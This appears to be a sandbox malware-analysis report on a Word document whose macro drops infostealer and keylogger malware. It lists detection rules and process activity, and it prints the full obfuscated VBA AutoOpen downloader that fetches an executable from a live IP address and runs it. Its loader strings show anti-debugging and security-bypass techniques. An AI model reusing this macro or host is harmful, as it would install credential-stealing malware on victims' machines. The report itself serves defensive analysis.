                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000001.1967244493.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000002.3047709158.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:01:53:38
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\Nsltarpn.PIF
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Nsltarpn.PIF"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'161'216 bytes
                                                                                                                                                                        MD5 hash:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:01:53:39
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:01:53:39
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:01:53:39
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:175'800 bytes
                                                                                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000012.00000001.2046118520.0000000000BE0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000002.3075519147.0000000020A7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000012.00000002.3047750977.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000012.00000002.3047750977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000012.00000001.2046118520.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Call Graph

                                                                                                                                                                        callgraph 9 AutoOpen Shell:1,CreateObject:2,Open:1,Send:1

                                                                                                                                                                        Module: ThisDocument

                                                                                                                                                                        Declaration
                                                                                                                                                                        Line | Content
                                                                                                                                                                        1

                                                                                                                                                                        Attribute VB_Name = "ThisDocument"

                                                                                                                                                                        2

                                                                                                                                                                        Attribute VB_Base = "1Normal.ThisDocument"

                                                                                                                                                                        3

                                                                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                                                                        4

                                                                                                                                                                        Attribute VB_Creatable = False

                                                                                                                                                                        5

                                                                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                                                                        6

                                                                                                                                                                        Attribute VB_Exposed = True

                                                                                                                                                                        7

                                                                                                                                                                        Attribute VB_TemplateDerived = True

                                                                                                                                                                        8

                                                                                                                                                                        Attribute VB_Customizable = True

                                                                                                                                                                        APIs | Meta Information

                                                                                                                                                                        CreateObject

                                                                                                                                                                        CreateObject("MSXML2.ServerXMLHTTP")

                                                                                                                                                                        CreateObject

                                                                                                                                                                        CreateObject("Adodb.Stream")

                                                                                                                                                                        Open

                                                                                                                                                                        IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/albt.exe",False)

                                                                                                                                                                        Send

                                                                                                                                                                        responsebody

                                                                                                                                                                        IServerXMLHTTPRequest2.responsebody()

                                                                                                                                                                        Shell

                                                                                                                                                                        Shell(""brightness.exe"") -> 7884
                                                                                                                                                                        Strings | Decrypted Strings
                                                                                                                                                                        "M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
                                                                                                                                                                        "Ad""od""b.S""tr""ea""m"
                                                                                                                                                                        "h"
                                                                                                                                                                        "t"
                                                                                                                                                                        "t""p:/""/147.124.216.113/albt"
                                                                                                                                                                        "."
                                                                                                                                                                        "e"
                                                                                                                                                                        "x"
                                                                                                                                                                        "e"
                                                                                                                                                                        "GET"
                                                                                                                                                                        "brightness"
                                                                                                                                                                        "."
                                                                                                                                                                        "e"
                                                                                                                                                                        "x"
                                                                                                                                                                        "e"
                                                                                                                                                                        """brightness"
                                                                                                                                                                        "."
                                                                                                                                                                        "e"
                                                                                                                                                                        "x"
                                                                                                                                                                        "e"""
                                                                                                                                                                        Line | Instruction | Meta Information
                                                                                                                                                                        9

                                                                                                                                                                        Sub AutoOpen()

                                                                                                                                                                        11

                                                                                                                                                                        Dim xHttp

                                                                                                                                                                        executed
                                                                                                                                                                        16

                                                                                                                                                                        Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")

                                                                                                                                                                        CreateObject("MSXML2.ServerXMLHTTP")

                                                                                                                                                                        executed
                                                                                                                                                                        18

                                                                                                                                                                        Dim bStrm

                                                                                                                                                                        20

                                                                                                                                                                        Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")

                                                                                                                                                                        CreateObject("Adodb.Stream")

                                                                                                                                                                        executed
                                                                                                                                                                        24

                                                                                                                                                                        Dim nirm1

                                                                                                                                                                        25

                                                                                                                                                                        nirm1 = "h"

                                                                                                                                                                        26

                                                                                                                                                                        Dim nirm2

                                                                                                                                                                        27

                                                                                                                                                                        nirm2 = "t"

                                                                                                                                                                        28

                                                                                                                                                                        Dim nirm3

                                                                                                                                                                        29

                                                                                                                                                                        nirm3 = "t" & "p:/" & "/147.124.216.113/albt"

                                                                                                                                                                        30

                                                                                                                                                                        Dim nirm4

                                                                                                                                                                        31

                                                                                                                                                                        nirm4 = "."

                                                                                                                                                                        32

                                                                                                                                                                        Dim nirm5

                                                                                                                                                                        33

                                                                                                                                                                        nirm5 = "e"

                                                                                                                                                                        34

                                                                                                                                                                        Dim nirm6

                                                                                                                                                                        35

                                                                                                                                                                        nirm6 = "x"

                                                                                                                                                                        36

                                                                                                                                                                        Dim nirm7

                                                                                                                                                                        37

                                                                                                                                                                        nirm7 = "e"

                                                                                                                                                                        41

                                                                                                                                                                        Dim plpl

                                                                                                                                                                        42

                                                                                                                                                                        plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

                                                                                                                                                                        45

                                                                                                                                                                        xHttp.Open "GET", plpl, False

                                                                                                                                                                        IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/albt.exe",False)

                                                                                                                                                                        executed
                                                                                                                                                                        46

                                                                                                                                                                        xHttp.Send

                                                                                                                                                                        Send

                                                                                                                                                                        52

                                                                                                                                                                        With bStrm

                                                                                                                                                                        53

                                                                                                                                                                        .Type = 1

                                                                                                                                                                        54

                                                                                                                                                                        .Open

                                                                                                                                                                        55

                                                                                                                                                                        .write xHttp.responsebody

                                                                                                                                                                        IServerXMLHTTPRequest2.responsebody()

                                                                                                                                                                        executed
Dim monu1
monu1 = "brightness"
Dim monu2
monu2 = "."
Dim monu3
monu3 = "e"
Dim monu4
monu4 = "x"
Dim monu5
monu5 = "e"
Dim monu6
monu6 = monu1 & monu2 & monu3 & monu4 & monu5
. savetofile monu6, 2
Dim parveen1
Dim parveen2
Dim parveen3
Dim parveen4
Dim praveen1
praveen1 = """brightness"
Dim praveen2
praveen2 = "."
Dim praveen3
praveen3 = "e"
Dim praveen4
praveen4 = "x"
Dim praveen5
praveen5 = "e"""
Dim praveen6
praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
End With
Shell (praveen6)

Shell(""brightness.exe"") -> 7884
executed

End Sub


                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:15.2%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:17.7%
                                                                                                                                                                          Total number of Nodes:300
                                                                                                                                                                          Total number of Limit Nodes:21
                                                                                                                                                                          APIs
                                                                                                                                                                          • InetIsOffline.URL(00000000,00000000,0292B3D5,?,?,?,000002F7,00000000,00000000), ref: 0291F0E2
                                                                                                                                                                            • Part of subcall function 0291881C: LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                            • Part of subcall function 0291881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                            • Part of subcall function 0291881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 0291881C: FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                            • Part of subcall function 0291EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0291F3CC,UacInitialize,0296237C,0292B40C,UacScan,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString), ref: 0291EFCE
                                                                                                                                                                            • Part of subcall function 0291EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0291EFE0
                                                                                                                                                                            • Part of subcall function 0291F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0291F034
                                                                                                                                                                            • Part of subcall function 0291F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0291F046
                                                                                                                                                                            • Part of subcall function 0291F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0291F05D
                                                                                                                                                                            • Part of subcall function 02907E10: GetFileAttributesA.KERNEL32(00000000,?,0291FD00,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString,0296237C,0292B40C,UacScan,0296237C,0292B40C,UacInitialize), ref: 02907E1B
                                                                                                                                                                            • Part of subcall function 0290C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A568C8,?,02920032,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession), ref: 0290C2FB
                                                                                                                                                                            • Part of subcall function 0291DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291E0B4), ref: 0291E01F
                                                                                                                                                                            • Part of subcall function 0291DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0291E0B4), ref: 0291E04F
                                                                                                                                                                            • Part of subcall function 0291DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0291E064
                                                                                                                                                                            • Part of subcall function 0291DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0291E090
                                                                                                                                                                            • Part of subcall function 0291DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0291E099
                                                                                                                                                                            • Part of subcall function 02907E34: GetFileAttributesA.KERNEL32(00000000,?,02922E7D,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,Initialize), ref: 02907E3F
                                                                                                                                                                            • Part of subcall function 02907FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0292301B,OpenSession,0296237C,0292B40C,ScanString,0296237C,0292B40C,Initialize,0296237C,0292B40C,ScanString,0296237C,0292B40C), ref: 02907FD5
                                                                                                                                                                            • Part of subcall function 0291DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DFD2), ref: 0291DF3F
                                                                                                                                                                            • Part of subcall function 0291DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0291DF79
                                                                                                                                                                            • Part of subcall function 0291DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0291DFA6
                                                                                                                                                                            • Part of subcall function 0291DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0291DFAF
                                                                                                                                                                            • Part of subcall function 02918798: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize,029623A4,0291A774,UacScan), ref: 029187AC
                                                                                                                                                                            • Part of subcall function 02918798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029187C6
                                                                                                                                                                            • Part of subcall function 02918798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize), ref: 02918802
                                                                                                                                                                            • Part of subcall function 02918704: LoadLibraryW.KERNEL32(amsi), ref: 0291870D
                                                                                                                                                                            • Part of subcall function 02918704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0291876C
                                                                                                                                                                          • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,0292B764), ref: 02924DEB
                                                                                                                                                                            • Part of subcall function 0291DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0291DEA0
                                                                                                                                                                            • Part of subcall function 0291DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DEF2), ref: 0291DEB6
                                                                                                                                                                            • Part of subcall function 0291DE78: NtDeleteFile.NTDLL(?), ref: 0291DED5
                                                                                                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02924FEB
                                                                                                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02925041
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                                                                          • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                                                          • API String ID: 2010126900-181751239
                                                                                                                                                                          • Opcode ID: d16a61f8e4a7d4fa654a16e5b26d0407df8c60cac6309d75efc84d7d141494fe
                                                                                                                                                                          • Instruction ID: ab12b69df1f46a1db2491ee4f211285122845c7e8b10e78713ca25c486eb1098
                                                                                                                                                                          • Opcode Fuzzy Hash: d16a61f8e4a7d4fa654a16e5b26d0407df8c60cac6309d75efc84d7d141494fe
